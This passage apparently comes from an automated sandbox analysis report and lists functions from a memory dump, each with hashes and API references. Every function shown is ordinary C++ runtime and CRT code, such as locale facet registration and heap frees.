Instruction ID: 6a4a3e08ded4054197777a8f02cf788b8b00b9d1e14d8a505385b4a4c52c1c2b
Opcode Fuzzy Hash: 169dedf51f5d0f82ac054f09c8c6978058cf34377111132661ad34b0c4d6ee92
Instruction Fuzzy Hash: 2C119A328042299BCF14DBA5C840EFE7B75AF85364F26050DD610AB391DF74EE418BD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D480420, Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D480431
collate.LIBCPMT ref: 6D48046B
std::_Facet_Register.LIBCPMT ref: 6D480482
std::_Lockit::~_Lockit.LIBCPMT ref: 6D4804A2
__CxxThrowException@8.LIBVCRUNTIME ref: 6D4804C0

Memory Dump Source

Source File: 00000004.00000002.908424764.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrowcollate
String ID:
API String ID: 86117490-0
Opcode ID: f346fb75506384176464aeb08b68611dbc3830018fd22625057d3dde33f21c6e
Instruction ID: bf2ccf3a0551a2146f17593b45fa2422438b2e61c61384e3bafa3a5d254fb74a
Opcode Fuzzy Hash: f346fb75506384176464aeb08b68611dbc3830018fd22625057d3dde33f21c6e
Instruction Fuzzy Hash: 3D11EC329042299BCF15DFA1C880EEE7775AF80764F26040DD611BB2A0DF30DE418BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D4804C6, Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D4804D7
collate.LIBCPMT ref: 6D480511
std::_Facet_Register.LIBCPMT ref: 6D480528
std::_Lockit::~_Lockit.LIBCPMT ref: 6D480548
__CxxThrowException@8.LIBVCRUNTIME ref: 6D480566

Memory Dump Source

Source File: 00000004.00000002.908424764.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrowcollate
String ID:
API String ID: 86117490-0
Opcode ID: 39fe53d9a84223e915662a0862e69953a3564060f2a54ccd8ffd2a021565f28b
Instruction ID: 35853d34022c736bc9adaa1874975f74d622de95834dace82747b579904015f4
Opcode Fuzzy Hash: 39fe53d9a84223e915662a0862e69953a3564060f2a54ccd8ffd2a021565f28b
Instruction Fuzzy Hash: 3D11AC728046299BCF05DFA5C884EEE7775AF84368F26040DD614AB290DF34EE058BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D480612, Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D480623
messages.LIBCPMT ref: 6D48065D
std::_Facet_Register.LIBCPMT ref: 6D480674
std::_Lockit::~_Lockit.LIBCPMT ref: 6D480694
__CxxThrowException@8.LIBVCRUNTIME ref: 6D4806B2

Memory Dump Source

Source File: 00000004.00000002.908424764.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrowmessages
String ID:
API String ID: 447356255-0
Opcode ID: 3d333e042352d5b1308f0ef8bf65b45a651cd0ee9679d2fa82f1a104f3f4c2a1
Instruction ID: bf55b2ccaeb9bde9b5476912c0cd11da5956d0c329e2bdaf73b2ad1eeb8fe921
Opcode Fuzzy Hash: 3d333e042352d5b1308f0ef8bf65b45a651cd0ee9679d2fa82f1a104f3f4c2a1
Instruction Fuzzy Hash: 7A11A0328042199BCF05DB65C844EEE7775AF84354F2A040DD616BB390DF74DE018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48CE2A, Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D48CE3B
moneypunct.LIBCPMT ref: 6D48CE75
std::_Facet_Register.LIBCPMT ref: 6D48CE8C
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48CEAC
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48CECA

Memory Dump Source

Source File: 00000004.00000002.908424764.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrowmoneypunct
String ID:
API String ID: 158860062-0
Opcode ID: 91452b926b02fe09204edfdb5baaebb95c3a019fc8e1e817282bd6f99ccbc297
Instruction ID: 673cb1e2456a296a382d523126225180c3ec358f0679807872fd1924a273018d
Opcode Fuzzy Hash: 91452b926b02fe09204edfdb5baaebb95c3a019fc8e1e817282bd6f99ccbc297
Instruction Fuzzy Hash: C3119A729042298BCF14DBA5C840EFE77B5AF84754F26010ED610AB391DF74EE419BD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D480E80, Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D480E91
numpunct.LIBCPMT ref: 6D480ECB
std::_Facet_Register.LIBCPMT ref: 6D480EE2
std::_Lockit::~_Lockit.LIBCPMT ref: 6D480F02
__CxxThrowException@8.LIBVCRUNTIME ref: 6D480F20

Memory Dump Source

Source File: 00000004.00000002.908424764.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrownumpunct
String ID:
API String ID: 2501072427-0
Opcode ID: 3a234ae8d2625f3f6814d5e645d248dcb61e3a9983c5675b96d625a783e90026
Instruction ID: 9df684e113dfa27f0677b02a0ec607c5ea61fd674d176d0d83a8b29f93d3b353
Opcode Fuzzy Hash: 3a234ae8d2625f3f6814d5e645d248dcb61e3a9983c5675b96d625a783e90026
Instruction Fuzzy Hash: 0611A0329042199BCF15DF65C844EFE7775AF85354F26041DD6116B290DF74DE018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D4806B8, Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D4806C9
messages.LIBCPMT ref: 6D480703
std::_Facet_Register.LIBCPMT ref: 6D48071A
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48073A
__CxxThrowException@8.LIBVCRUNTIME ref: 6D480758

Memory Dump Source

Source File: 00000004.00000002.908424764.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrowmessages
String ID:
API String ID: 447356255-0
Opcode ID: 78ac1076fa26bf45fafe6df12a1640ed719bd07d585b3a9411fbb709b65a5d4b
Instruction ID: 36659fa113f989637416a9e81e08acb4ad8f06632a8f18e2a956507b894c6d8f
Opcode Fuzzy Hash: 78ac1076fa26bf45fafe6df12a1640ed719bd07d585b3a9411fbb709b65a5d4b
Instruction Fuzzy Hash: CB119A329042698BCF15DBA5C884EEE7775AF84768F26041ED611AB290DF34DE01CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D4809F6, Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D480A07
moneypunct.LIBCPMT ref: 6D480A41
std::_Facet_Register.LIBCPMT ref: 6D480A58
std::_Lockit::~_Lockit.LIBCPMT ref: 6D480A78
__CxxThrowException@8.LIBVCRUNTIME ref: 6D480A96

Memory Dump Source

Source File: 00000004.00000002.908424764.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrowmoneypunct
String ID:
API String ID: 158860062-0
Opcode ID: 3b7713bc617e64bcf42d1043b4f4f8b5a55bf65e6e5abccc8bf604e617f56a8f
Instruction ID: b21035272712467243b7f4e3958dcc3923e8df0d1bd56202bde803e3550932e6
Opcode Fuzzy Hash: 3b7713bc617e64bcf42d1043b4f4f8b5a55bf65e6e5abccc8bf604e617f56a8f
Instruction Fuzzy Hash: C011AC328041299BCF15DFA6C840EEE77B5AF84358F26440DD610AB291DF74EE028BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D480B42, Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D480B53
moneypunct.LIBCPMT ref: 6D480B8D
std::_Facet_Register.LIBCPMT ref: 6D480BA4
std::_Lockit::~_Lockit.LIBCPMT ref: 6D480BC4
__CxxThrowException@8.LIBVCRUNTIME ref: 6D480BE2

Memory Dump Source

Source File: 00000004.00000002.908424764.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrowmoneypunct
String ID:
API String ID: 158860062-0
Opcode ID: b22674adcddd4f7ca0ee1961414124575ca3a12ea92b250425039b3bdff5b0c2
Instruction ID: dcc723c190bfc79ed722ede56f5d2dfb2289a093371cb7d3842c33cdab91b612
Opcode Fuzzy Hash: b22674adcddd4f7ca0ee1961414124575ca3a12ea92b250425039b3bdff5b0c2
Instruction Fuzzy Hash: F2119A728041698BCF15DBA5C884EEE7775AF85368F26080DE611BB2A0DF74DE018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48037A, Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D48038B
codecvt.LIBCPMT ref: 6D4803C5
std::_Facet_Register.LIBCPMT ref: 6D4803DC
std::_Lockit::~_Lockit.LIBCPMT ref: 6D4803FC
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48041A

Memory Dump Source

Source File: 00000004.00000002.908424764.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrowcodecvt
String ID:
API String ID: 324574759-0
Opcode ID: 647b72f24ef8154aad12e132a8b52c56a68bd27abf08c229c282e7846524e63f
Instruction ID: 2f258415c9a8f746fcb9e5d6df13fc1a86bb0639220ee111e2f22b56d37eb188
Opcode Fuzzy Hash: 647b72f24ef8154aad12e132a8b52c56a68bd27abf08c229c282e7846524e63f
Instruction Fuzzy Hash: D511AC7290422A8BCF14DBA6C890EEE7775AF85764F26040DD610AB391DF74DE418BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D480BE8, Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D480BF9
moneypunct.LIBCPMT ref: 6D480C33
std::_Facet_Register.LIBCPMT ref: 6D480C4A
std::_Lockit::~_Lockit.LIBCPMT ref: 6D480C6A
__CxxThrowException@8.LIBVCRUNTIME ref: 6D480C88

Memory Dump Source

Source File: 00000004.00000002.908424764.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrowmoneypunct
String ID:
API String ID: 158860062-0
Opcode ID: 17c619255c18b71b77515c0aa2dcf6448f7f865416d62d7222f870f8e7899223
Instruction ID: 1f4bdf154e9b70b017e5b69de2733d84f86e373b8fcc8f200a90fed21d123b15
Opcode Fuzzy Hash: 17c619255c18b71b77515c0aa2dcf6448f7f865416d62d7222f870f8e7899223
Instruction Fuzzy Hash: AC119A72904229CBCF19DFA5C884EEE7775AF85364F26080DE610AB2A0DF34DE018BD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48CB92, Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D48CBA3
messages.LIBCPMT ref: 6D48CBDD
std::_Facet_Register.LIBCPMT ref: 6D48CBF4
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48CC14
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48CC32

Memory Dump Source

Source File: 00000004.00000002.908424764.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrowmessages
String ID:
API String ID: 447356255-0
Opcode ID: ebbdecfe602bc82e657915630c458349b6f06886b2c6c89da16d6b01a31d9bb4
Instruction ID: e4f4da627cea5d70f590c2cdc33763716322624db6d232ccd484656c287c18e9
Opcode Fuzzy Hash: ebbdecfe602bc82e657915630c458349b6f06886b2c6c89da16d6b01a31d9bb4
Instruction Fuzzy Hash: 6D11AC328042298BCF04DFA5C880EEE7775AF85364F26050EE611AB391DF74DE419BD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D480A9C, Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D480AAD
moneypunct.LIBCPMT ref: 6D480AE7
std::_Facet_Register.LIBCPMT ref: 6D480AFE
std::_Lockit::~_Lockit.LIBCPMT ref: 6D480B1E
__CxxThrowException@8.LIBVCRUNTIME ref: 6D480B3C

Memory Dump Source

Source File: 00000004.00000002.908424764.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrowmoneypunct
String ID:
API String ID: 158860062-0
Opcode ID: 323ecd5e2bed572ea63a9ae1573f48b712ba0917a30be212679592e31de3f1c9
Instruction ID: 159880a051bd0091e8134d7548f6d7eafc48328174261f07046a2a3989c3389d
Opcode Fuzzy Hash: 323ecd5e2bed572ea63a9ae1573f48b712ba0917a30be212679592e31de3f1c9
Instruction Fuzzy Hash: F511AC329042298BCF05DFA6C880EEE7775AF85368F26040DD611AB291DF74DE41CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D4BDEDB, Relevance: 7.6, APIs: 5, Instructions: 53COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,6D4B41FE,6D4BF5DE,?,6D4BDE85,00000001,00000364,?,?,6D4B42CA,?,?,6D47A5FA), ref: 6D4BDEE0
_free.LIBCMT ref: 6D4BDF15
_free.LIBCMT ref: 6D4BDF3C
SetLastError.KERNEL32(00000000), ref: 6D4BDF49
SetLastError.KERNEL32(00000000), ref: 6D4BDF52

Memory Dump Source

Source File: 00000004.00000002.908424764.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 204c192c861736073a41df0f15aecda71262964ca1336a77097ea624176297a7
Instruction ID: c231fee8f303f25c348a00c1e1bc0176ea73fec657a03491ce655016503f57b7
Opcode Fuzzy Hash: 204c192c861736073a41df0f15aecda71262964ca1336a77097ea624176297a7
Instruction Fuzzy Hash: 6001493E10C60126DE0286394C84F1A2E79ABE63BAB33416DF60E93381FF31CC0181B5

Uniqueness

Uniqueness Score: -1.00%

Function 6D4CC438, Relevance: 7.5, APIs: 5, Instructions: 40COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6D4CC450

Part of subcall function 6D4C02CE: HeapFree.KERNEL32(00000000,00000000,?,6D4CC724,?,00000000,?,00000000,?,6D4CCA29,?,00000007,?,?,6D4CBDC8,?), ref: 6D4C02E4
Part of subcall function 6D4C02CE: GetLastError.KERNEL32(?,?,6D4CC724,?,00000000,?,00000000,?,6D4CCA29,?,00000007,?,?,6D4CBDC8,?,?), ref: 6D4C02F6

_free.LIBCMT ref: 6D4CC462
_free.LIBCMT ref: 6D4CC474
_free.LIBCMT ref: 6D4CC486
_free.LIBCMT ref: 6D4CC498

Memory Dump Source

Source File: 00000004.00000002.908424764.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: f10d7b58bbe39dd218081843b1078a4602fc37290dd59879506204f52597c893
Instruction ID: 4d67c89da36e85a05af5071ede19e8db2b127fb059a4bd19b2c2f806b34427ef
Opcode Fuzzy Hash: f10d7b58bbe39dd218081843b1078a4602fc37290dd59879506204f52597c893
Instruction Fuzzy Hash: 76F04F7D50920597DF20DE65E581E2633E9AB056227738809F518EBB00D731FCC08AAA

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C2A87, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186COMMON

Download Yara Rule

Strings

L<Km, xrefs: 6D4C2B86

Memory Dump Source

Source File: 00000004.00000002.908424764.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID:
String ID: L<Km
API String ID: 0-4252610374
Opcode ID: 59e0ecba0fd12e18b684743089c37dd0f249ff1982f4c4212aa115e2565e32dd
Instruction ID: 527e53a791ee1cc964f81fa84e191f59de085f45ab9be425f9c54236223fa4f7
Opcode Fuzzy Hash: 59e0ecba0fd12e18b684743089c37dd0f249ff1982f4c4212aa115e2565e32dd
Instruction Fuzzy Hash: 8651B879D5820A9FDF21CFA9C884FAE7BB4BF16314F115149E514A7250DFB09D01CB62

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C3F56, Relevance: 6.1, APIs: 4, Instructions: 110COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,4D8A1055,?,00000000,00000000,?,?,?,?,00000001,?,4D8A1055,00000001,?,?), ref: 6D4C3FA3
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 6D4C402C
GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,6D4B60DF), ref: 6D4C403E
__freea.LIBCMT ref: 6D4C4047

Part of subcall function 6D4C1817: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 6D4C1849

Memory Dump Source

Source File: 00000004.00000002.908424764.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 757e17827b2c4fe956b09aba4731e399595842ec85f8af8b708d8ff172e33a3f
Instruction ID: 05e0e09f78537c155c125e2a50027fdf50212e625966caf5ab1ab347b1616247
Opcode Fuzzy Hash: 757e17827b2c4fe956b09aba4731e399595842ec85f8af8b708d8ff172e33a3f
Instruction Fuzzy Hash: B7319D36A0020AABDF25CF66DC84EAE3BA5EB45254F114229EC18DB250E739DD51CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6D480D34, Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D480D45
std::_Facet_Register.LIBCPMT ref: 6D480D96
std::_Lockit::~_Lockit.LIBCPMT ref: 6D480DB6
__CxxThrowException@8.LIBVCRUNTIME ref: 6D480DD4

Memory Dump Source

Source File: 00000004.00000002.908424764.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrow
String ID:
API String ID: 1640353255-0
Opcode ID: 5a6e74543efa17602a7f554399ad1ad1a457ed473aee90981bd9ecb4f178b17f
Instruction ID: 11ed2e06494746cad1f0524cea18405a93ba614d5b12e7c57329dac7e4d6a8ec
Opcode Fuzzy Hash: 5a6e74543efa17602a7f554399ad1ad1a457ed473aee90981bd9ecb4f178b17f
Instruction Fuzzy Hash: C211EC328042298BCF04CFA5C854EEE77B5AF81358F26040DE601AB390DF30EE018BD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D480DDA, Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D480DEB
std::_Facet_Register.LIBCPMT ref: 6D480E3C
std::_Lockit::~_Lockit.LIBCPMT ref: 6D480E5C
__CxxThrowException@8.LIBVCRUNTIME ref: 6D480E7A

Memory Dump Source

Source File: 00000004.00000002.908424764.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrow
String ID:
API String ID: 1640353255-0
Opcode ID: c95429d6a5a043a578d33f128ab09f858e30e1dc304a234b478f6e6c95622fec
Instruction ID: 78d17f2754967a5607c9d52cba2232b9a4f0e6a02ab3608d9c84952614b99449
Opcode Fuzzy Hash: c95429d6a5a043a578d33f128ab09f858e30e1dc304a234b478f6e6c95622fec
Instruction Fuzzy Hash: E8119A7290422A9BCF15DBA5C884EFE7775AF85794F26040DE611AB390DF34DE018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48CC38, Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D48CC49
std::_Facet_Register.LIBCPMT ref: 6D48CC9A
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48CCBA
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48CCD8

Memory Dump Source

Source File: 00000004.00000002.908424764.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrow
String ID:
API String ID: 1640353255-0
Opcode ID: e9febdd977b16423b79748ebbf40217c0bcf0eb774d7ee06ffe101eef45e14b3
Instruction ID: c3ad9c35b194fccf1a0c64262b013db24cb39f7004ce579877582aee004c65bd
Opcode Fuzzy Hash: e9febdd977b16423b79748ebbf40217c0bcf0eb774d7ee06ffe101eef45e14b3
Instruction Fuzzy Hash: 0A11A0329041298BCF04DBA5C840EFE7775AF85354F26050ED610AB391DF74DE018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48CCDE, Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D48CCEF
std::_Facet_Register.LIBCPMT ref: 6D48CD40
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48CD60
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48CD7E

Memory Dump Source

Source File: 00000004.00000002.908424764.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrow
String ID:
API String ID: 1640353255-0
Opcode ID: 8f239664b61ac9e91c3d5b778748338dee5f00bfd58879cf8e639b660fe5b289
Instruction ID: 44f282b8ddae375fc04f14845d1e7b67e1298913ab9a58ad5f1460d4373d4e79
Opcode Fuzzy Hash: 8f239664b61ac9e91c3d5b778748338dee5f00bfd58879cf8e639b660fe5b289
Instruction Fuzzy Hash: 2911A0328041598BCF14DBA5C840EEE7BB5BF85754F26051DD6116B2A1DF74DE018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D480C8E, Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D480C9F
std::_Facet_Register.LIBCPMT ref: 6D480CF0
std::_Lockit::~_Lockit.LIBCPMT ref: 6D480D10
__CxxThrowException@8.LIBVCRUNTIME ref: 6D480D2E

Memory Dump Source

Source File: 00000004.00000002.908424764.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrow
String ID:
API String ID: 1640353255-0
Opcode ID: 3a0489795db3487f8d127704e452e0b3fb2ff1ae28d768859db2fde6f981dc88
Instruction ID: 3fcc104816214e690e977a3a015f63bbb5b5160fb19c4fa7cf3cf6e133f50979
Opcode Fuzzy Hash: 3a0489795db3487f8d127704e452e0b3fb2ff1ae28d768859db2fde6f981dc88
Instruction Fuzzy Hash: 8A11AC328041698BCF05DFA6C884EEE77B5AF84354F26440EE615AB290DF34EE01CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48075E, Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D48076F
std::_Facet_Register.LIBCPMT ref: 6D4807C0
std::_Lockit::~_Lockit.LIBCPMT ref: 6D4807E0
__CxxThrowException@8.LIBVCRUNTIME ref: 6D4807FE

Memory Dump Source

Source File: 00000004.00000002.908424764.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrow
String ID:
API String ID: 1640353255-0
Opcode ID: c3bd025fa392089247d8c774d7b86dde66107961114d62c683d7931ee1521b76
Instruction ID: 177bcea6f51a6758e95a3f8c7eabc97e9f89100572e05defd5642680c2618e72
Opcode Fuzzy Hash: c3bd025fa392089247d8c774d7b86dde66107961114d62c683d7931ee1521b76
Instruction Fuzzy Hash: 7D119A36C042298BCF05DBA6C880EEE7775AF85764F26041DD611AB2A1DF74DE018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D480F26, Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D480F37
std::_Facet_Register.LIBCPMT ref: 6D480F88
std::_Lockit::~_Lockit.LIBCPMT ref: 6D480FA8
__CxxThrowException@8.LIBVCRUNTIME ref: 6D480FC6

Memory Dump Source

Source File: 00000004.00000002.908424764.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrow
String ID:
API String ID: 1640353255-0
Opcode ID: 2a667bc4cca61343518e2f66ed4a5a5a13052eb77c3b6e884d9f2055d220e05e
Instruction ID: 5f9de9f948c43be1c1318fee31d502832e5cb35c9637a851bcae922b45bd7756
Opcode Fuzzy Hash: 2a667bc4cca61343518e2f66ed4a5a5a13052eb77c3b6e884d9f2055d220e05e
Instruction Fuzzy Hash: 72119E329042199BCF05DF66C840EEE7776BF84754F26440DE614AB291DFB4DE018BD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D480FCC, Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D480FDD
std::_Facet_Register.LIBCPMT ref: 6D48102E
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48104E
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48106C

Memory Dump Source

Source File: 00000004.00000002.908424764.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrow
String ID:
API String ID: 1640353255-0
Opcode ID: c56bc8c21908ff25d29b172b7e09e45db72f52923a99d5a2fa02198edc2a2d23
Instruction ID: 89bf6edb30f7e89e9c9809681f86f3c138b17145cd3dd8c42011dc5e0c1290b0
Opcode Fuzzy Hash: c56bc8c21908ff25d29b172b7e09e45db72f52923a99d5a2fa02198edc2a2d23
Instruction Fuzzy Hash: 25118C329042598BCF15DBA4C884EEE7775BF85394F26040ED621AB291DF349E018BD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48CED0, Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D48CEE1
std::_Facet_Register.LIBCPMT ref: 6D48CF32
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48CF52
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48CF70

Memory Dump Source

Source File: 00000004.00000002.908424764.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrow
String ID:
API String ID: 1640353255-0
Opcode ID: 06d97fd7791d7a2d5a17ea833c487a0e9f4c780b8be95ddcd556a04e7f0c0c4a
Instruction ID: a833da3f418ed1dc61409a7b590e3b8ceabe871af1ddbfb45da1472c377a8001
Opcode Fuzzy Hash: 06d97fd7791d7a2d5a17ea833c487a0e9f4c780b8be95ddcd556a04e7f0c0c4a
Instruction Fuzzy Hash: E011AC328041299BCF05DFA5C840EEE7B75AF84764F26450EE614AB391DF74EE018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D480950, Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D480961
std::_Facet_Register.LIBCPMT ref: 6D4809B2
std::_Lockit::~_Lockit.LIBCPMT ref: 6D4809D2
__CxxThrowException@8.LIBVCRUNTIME ref: 6D4809F0

Memory Dump Source

Source File: 00000004.00000002.908424764.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrow
String ID:
API String ID: 1640353255-0
Opcode ID: 1c4b3b0079c801e8f752b3533dfc2b96c00f99121712f5056ef7ee56d41829e6
Instruction ID: 79edab8c93175075049ccbc22e27aaddad4a8d8bf4e9fd0dc66c7a30cde1445d
Opcode Fuzzy Hash: 1c4b3b0079c801e8f752b3533dfc2b96c00f99121712f5056ef7ee56d41829e6
Instruction Fuzzy Hash: E011AC72805129CBCF15DFA5C854EEE7775AF85358F26040DE614AB290DF34DE018BD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D47B9F2, Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D47BA03
std::_Facet_Register.LIBCPMT ref: 6D47BA54
